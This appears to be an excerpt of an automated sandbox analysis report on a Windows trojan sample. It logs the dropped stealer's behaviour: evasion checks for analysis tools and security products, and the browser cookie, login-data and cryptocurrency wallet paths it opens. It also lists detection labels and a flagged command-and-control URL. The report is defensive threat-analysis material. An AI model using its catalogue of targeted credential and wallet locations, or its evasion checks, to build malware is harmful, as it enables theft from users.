                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                  Source: explorer.exe, 00000007.00000002.3300553941.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098529003.0000000009C05000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000007.00000000.2053381911.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000007.00000000.2049075653.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3291497837.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD6CF90 cpuid 0_2_00007FF79CD6CF90
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,7_2_08B979B4
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,7_2_08B8E9CC
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,7_2_08B9813C
                  Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_08B972AC
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,7_2_08B97428
                  Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,7_2_08B8FF98
                  Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_0E8D7EAC
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0E8D9FF4
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,7_2_0E8D9F40
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,7_2_0E8D85B4
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,7_2_0E8CF5CC
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,7_2_0E8D8D3C
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,7_2_0E8D7D50
                  Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,7_2_0E8D9AD4
                  Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,7_2_0E8D0B98
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0E8E0378
                  Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,7_2_0E8DA0F8
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,7_2_0E8D8028
                  Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,7_2_0E8D29BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_00007FF8B836FA48
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetProcAddress,GetLocaleInfoW,21_2_00007FF8B831DC20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,21_2_00007FF8B836D2E0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: EnumSystemLocalesW,21_2_00007FF8B836F35C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,21_2_00007FF8B836F3C4
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,21_2_00007FF8B836F478
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_00007FF8B836F8C0
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\ucrtbase.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\base_library.zip VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\_ctypes.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-console-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l1-2-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-file-l2-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-heap-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-synch-l1-2-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-sysinfo-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-timezone-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-core-util-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-conio-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-math-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\api-ms-win-crt-stdio-l1-1-0.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI54762\_lzma.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Documents VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Documents\LFOPODGVOH VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61E60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF79CD61E60
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8C5570 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,7_2_0E8C5570
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F4518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,20_2_00007FF641F4518C
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF7948333EC GetVersionExW,1_2_00007FF7948333EC
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
                  Source: systemsx.exe, svchost.exe, 616766F8886C145454191.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.0.DB9C.tmp.ssg.exe.e50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB9C.tmp.ssg.exe PID: 1292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior

                  Remote Access Functionality

                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.0.DB9C.tmp.ssg.exe.e50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000000.2151588045.0000000000E52000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DB9C.tmp.ssg.exe PID: 1292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  [Figure: Behavior Graph. ID: 1575318, Sample: K6qneGSDSB.exe, Startdate: 15/12/2024, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label | Link
                  K6qneGSDSB.exe | 61% | ReversingLabs | Win64.Trojan.Nekark |
                  K6qneGSDSB.exe | 100% | Avira | HEUR/AGEN.1317454 |
                  K6qneGSDSB.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe | 34% | ReversingLabs | Win64.Trojan.Amadey |
                  C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.RedLineStealz |
                  C:\Users\user\AppData\Roaming\systemsx.exe | 75% | ReversingLabs | Win64.Trojan.Midie |
                  C:\Users\user\Desktop\Grabber.exe | 46% | ReversingLabs | Win32.Trojan.MintPorcupine |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  http://crl.mic3 | 0% | Avira URL Cloud | safe |
                  https://word.office.comon | 0% | Avira URL Cloud | safe |
                  http://185.81.68.147/VzCAHn.php?616766F8886C145454191 | 100% | Avira URL Cloud | phishing |
                  No contacted domains info
                  Name | Malicious | Antivirus Detection | Reputation
                  http://185.81.68.147/VzCAHn.php?616766F8886C145454191 | true | Avira URL Cloud: phishing | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/:hardwares.DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003276000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/DDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/06/addressingexDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
